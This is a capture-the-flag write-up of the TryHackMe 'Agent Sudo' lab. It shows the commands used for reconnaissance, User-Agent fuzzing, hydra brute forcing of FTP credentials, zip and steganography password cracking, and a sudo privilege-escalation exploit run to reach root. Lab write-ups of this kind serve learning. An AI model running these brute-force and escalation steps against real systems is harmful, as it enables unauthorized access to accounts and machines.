Recon
Nmap
As usual we start with nmap
sudo nmap -sV -A -T4 10.10.227.114 -oN nmap_results.txt
"PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef1f5d04d47795066072ecf058f2cc07 (RSA)
| 256 5e02d19ac4e7430662c19e25848ae7ea (ECDSA)
|_ 256 2d005cb9fda8c8d880e3924f8b4f18e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement"
Here we notice we have a ftp, ssh and http server.
HTTP server
Homepage
In this page we discover we need the codenames/usernames to navigate the server. One of the names should start with R.
Robots
No information can be extracted from the robots.txt page.
FTP
We try to login with anonymous but we do not succeed
Codenames
Since we know K is a codename we should try every letter of the alphabet
echo "A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z" > alphabet.txt
ffuf -w ./alphabet.txt -u http://10.10.201.112 -H "User-Agent: FUZZ" -fc 200 -fs 218 -fmode and -o ffuf_results.txt
# We notice User-Agent: C and R have a different page
curl -A "C" -L http://10.10.201.112:80/
"Attention chris, <br><br>
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>
From,<br>
Agent R"
curl -A "R" -L http://10.10.201.112:80/
"What are you doing! Are you one of the 25 employees? If not, I going to report this incident
<!DocType html>
<html>
<head>
<title>Annoucement</title>
</head>
<body>
<p>
Dear agents,
<br><br>
Use your own <b>codename</b> as user-agent to access the site.
<br><br>
From,<br>
Agent R
</p>
</body>
</html>"
Note: As a default I always try to filter by size and status code. The response might be another size or the code might be another (in this case it was a redirect). We also use -L
on curl to allow it to follow redirects.
We found there is an Agent C, also known as chris.
FTP Server
We can try to bruteforce
hydra -t 32 -l chris -P /usr/share/wordlists/rockyou.txt 10.10.201.112 ftp -I -o hydra_results.txt
"Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-17 15:48:41
[DATA] max 32 tasks per 1 server, overall 32 tasks, 14344399 login tries (l:1/p:14344399), ~448263 tries per task
[DATA] attacking ftp://10.10.201.112:21/
[21][ftp] host: 10.10.201.112 login: chris password: <password>
"
We can now enter the ftp
ftp 10.10.201.112
# chris
# <password>
ls
"-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png"
get To_agentJ.txt
get cute-alien.jpg
get cutie.png
exit
cat To_agentJ.txt
"Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C"
We use binwalk to extract extra content information from images
binwalk -e cutie.png
binwalk -e cute_alient.jpg
cd _cutie.png.extracted
ls
"365 365.zlib 8702.zip To_agentR.txt"
cat To_agentR.txt
""
zip2john 8702.zip > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
"<password> (8702.zip/To_agentR.txt)"
7z e 8702.zip
cat To_agentR.txt
"Agent C,
We need to send the picture to '<base64>' as soon as possible!
By,
Agent R
"
# Stegseek is a binary to extract hidden data from files.
stegseek cute-alien.jpg /usr/share/wordlists/rockyou.txt
cat cute-alien.jpg.out
"
Hi james,
Glad you find this message. Your login password is <password>
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
"
With the files explored we can now login through ssh
Entering Machine
ssh james@10.10.201.112
ls
"Alien_autospy.jpg user_flag.txt"
cat user_flag.txt
sudo -l
"Matching Defaults entries for james on agent-sudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash"
We query (ALL, !root) /bin/bash
and discover we have an exploit for it.
Privilege Escalation
python3 exploit.py
# We are now root
cat /root/root.txt
"
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
<flag>
By,
<Agent-R> a.k.a Agent R
"
Kanelao
Top comments (0)